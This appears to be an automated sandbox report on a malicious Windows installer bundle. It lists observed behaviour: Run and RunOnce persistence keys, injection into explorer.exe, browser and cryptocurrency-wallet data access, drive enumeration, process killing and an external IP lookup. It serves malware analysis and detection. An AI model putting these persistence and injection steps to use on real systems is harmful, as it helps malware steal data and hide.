N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0R9HU.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-M578V.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Rashapulaeno.exe\"" C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4376 set thread context of 5664 N/A C:\ProgramData\6069887.exe C:\ProgramData\6069887.exe
PID 6016 set thread context of 5280 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\7798956.exe
PID 3964 set thread context of 2400 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\Common Files\Rashapulaeno.exe C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\Common Files\Rashapulaeno.exe.config C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
File created C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-37GGM.tmp C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-69ATU.tmp C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-M8OTJ.tmp C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
File created C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIBB71.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC3A3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB458.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB62F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB22F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF2DB3CBBE0E94F046.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB582.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB6CD.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f74afdd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB389.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC279.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF7AABC63660E3ED3A.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC111.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB5E0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f74afdd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB3D9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB428.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBBB1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF8D2EF48A67A1EE1A.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF121E52EFC1528B44.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\AdvancedWindowsManager #1.job C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB3B8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB368.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\8\52C64B7E C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\sihclient.exe N/A
